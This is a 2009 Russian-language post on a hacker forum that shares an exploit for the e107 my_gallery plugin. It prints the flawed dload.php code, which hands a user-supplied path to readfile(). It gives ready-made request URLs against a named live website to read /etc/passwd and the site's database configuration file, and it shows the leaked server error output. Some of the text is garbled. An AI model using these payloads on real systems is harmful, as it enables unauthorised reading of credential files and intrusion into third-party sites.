26.08.2009, 15:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Сообщение от Solide Snake
e107 Plugin my_gallery 2.4.1 Exploit
Class: Input Validation Error
Remote: Yes
Vulnerable: e107.org my_gallery 2.4.1
e107.org my_gallery 2.3
e107.org my_gallery 0 1.image.php?file='; это в файле image постом выше
2. Читалка файлов
Файл dload.php
PHP код:
<?php
$file = $_GET['file'];
$date_txt = date("y-m-d_H-i-s");
$text = "Content-Disposition: attachment; filename=".$_SERVER["SERVER_NAME"]."_e107_my_gallery_".$date_txt.".jpg";
header('Content-type: image/jpeg');
header($text);
readfile($file);
?>
все тоже самое тока в еще одном файле
Пример : __http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=/etc/passwd
там он вам даст сохранить картинку, сохраняем, открываем в блокноте и видим след строчки
Код:
<br />
<b>Warning</b>: readfile(\') [<a href='function.readfile'>function.readfile</a>]: failed to open stream: No such file or directory in <b>/home/verrechi/public_html/e107_plugins/my_gallery/dload.php</b> on line <b>7</b><br />
*conf DB
http://www.verrechiaswords.com/e107_plugins/my_gallery/dload.php?file=../../e107_config.php
Последний раз редактировалось HAXTA4OK; 26.08.2009 в 16:57..
|
|
|